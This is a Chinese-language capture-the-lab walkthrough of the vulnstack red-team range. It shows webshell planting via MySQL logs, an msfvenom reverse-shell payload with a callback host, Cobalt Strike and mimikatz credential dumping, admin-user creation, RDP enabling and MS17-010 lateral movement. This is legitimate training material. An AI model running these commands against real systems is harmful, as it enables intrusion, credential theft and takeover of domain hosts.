ATT&CK实战系列——红队实战(一)
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
拓扑结构大体如下:
靶机下载地址:https://pan.baidu.com/share/init?surl=nC6V8e_EuKfaLb2IuEbe7w
提取码:n1u2
开机密码:hongrisec@2019
因为要搭建一个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。
Windows7(内配有phpstudy web环境):
域内主机Win2K3 Metasploitable:
域控Windows 2008:
外网初探
web服务器win7的模拟外网ip(192.168.72.129),打开页面后发现是一个Yxcms的站点
直接上御剑先扫一波康康有没有可疑的信息~
发现有很多目录,打开发现这个cms存在目录遍历漏洞:
我们在右侧公告栏发现敏感信息泄露:后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,这样我们直接进入后台康康能不能getshell。
然后我们投机取巧谷歌大法搜一搜康康这个cms有没有漏洞,搜索后发现YXcms 1.4.7 存在任意文件写入
直接在这里写入一句话php木马
然后我们根据之前目录遍历漏洞找到flag.php
命令执行是一个管理员权限,到这里可以直接用shell连接工具就行,然后还有一个方法是通过phpMyAdmin,默认的用户名,密码:root
phpmyadmin后台getshell的几种方式:
1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell
执行以下sql语句
show variables like ‘%secure%’;
发现没有写入权限,无法用select into outfile方法直接写入shell。再来看一下第二种方法,利用开启全局日志general_log去getshell,show variables like ‘%general%’;查看日志状态
当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。
1.SET GLOBAL general_log=‘on’; 开启日志
2.set global general_log_file=‘C:/phpstudy/www/yxcms/shell.php’;# 设置日志位置为网站目录
3.将一句话木马写入shell.php文件中 SELECT ''
然后使用蚁剑连接
杀入内网
发现我们刚刚拿到的shell是一个administrator权限的shell,这样我们就不用提权什么的了
查看3389是否开启(远程桌面的服务端口)
发现3389并没有开启,我们使用以下命令开启它:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
尝试直接远程桌面连接却失败了,可能是防火墙的原因
这时候我的思路就是制作一个msf的后门上传上去运行,然后反弹一个msf的shell回来,尝试关闭防火墙
生成一个后门文件test.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=6666 -f exe -o test.exe
msf大法
msfconsole (运行msfconsole)
msf>use exploit/multi/handler (选择模块)
输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号
输入命令show payloads会显示出有效的攻击载荷
然后上传test.exe并运行它
成功上线
getsystem //自动尝试提权
getuid //当前会话用户身份
run post/windows/manage/enable_rdp //关闭防火墙
关闭掉防火墙后,添加用户尝试远程连接上去
添加用户 net user test asd123ASD! /add #添加一个用户
net localgroup administrators test /add #将用户添加到管理员组
#登陆只能选择STU1域 #STU1/
为了方便后面的内网渗透,所以上传一个CS的shell并且反弹
Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。
钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。
主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 作为一款协同APT工具,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选。
使用的大致流程是:创建团队服务器->客户端连接团队服务器->创建监听器->生成payload对应监听器->靶机运行后门上线->后渗透
运行cs需要先有Java环境
生成cs shell并运行
hashdump
mimitakz获取到administrator(域管理员)的明文密码
接下来我们信息收集,对域中的其他主机进行内网渗透。
Ladon 192.168.52.0/24 OnlinePC # 多协议探测存活主机(IP、机器名、MAC地址、制造商)
Ladon 192.168.52.0/24 OsScan #多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
192.168.52.138 域控Windows 2008
192.168.52.141 域内主机Win2K3 Metasploitable
横向移动
横向渗透概念:
横向渗透攻击技术是复杂网络攻击中广泛使用的一种技术,特别是在高级持续威胁(Advanced Persistent Threats,APT)中更加热衷于使用这种攻击方法。攻击者可以利用这些技术,以被攻陷的系统为跳板,访问其他主机,获取包括邮箱、共享文件夹或者凭证信息在内的敏感资源。攻击者可以利用这些敏感信息,进一步控制其他系统、提升权限或窃取更多有价值的凭证。借助此类攻击,攻击者最终可能获取域控的访问权限,完全控制基于Windows系统的基础设施或与业务相关的关键账户。
在提权后,我们可以用mimikatz dump目标机的凭证,并进行内网横向移动
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
psexec横向移动
窃取token
在进程列表中,寻找以域管理员身份运行的进程,并选定进行steal token,如果成功,则会返回域管权限的beacon
这里窃取token 然后psexec横向移动域内主机Win2K3,ip为192.168.52.141,这是一种思路,由于失败然后我们用msf进行渗透
我们先添加一下路由
run autoroute -s 192.168.52.0/24
run autoroute -p
探测是否存在ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.141
run
存在漏洞,但是实际攻击失败了
选择下面的模块
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.52.141
set payload windows/meterpreter/bind_tcp
拿到系统权限
开启2003远程桌面
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set COMMAND REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\* \*Server /v fDenyTSConnections /t REG_DWIRD /d 00000000 /f
远程登陆Win2K3 Metasploitable成功
小白渗透不喜勿喷~
学大佬的方法 网址如下
https://www.bilibili.com/read/cv6476215/
https://www.sohu.com/a/382017102_100014967
http://www.secwk.com/2019/11/05/13705/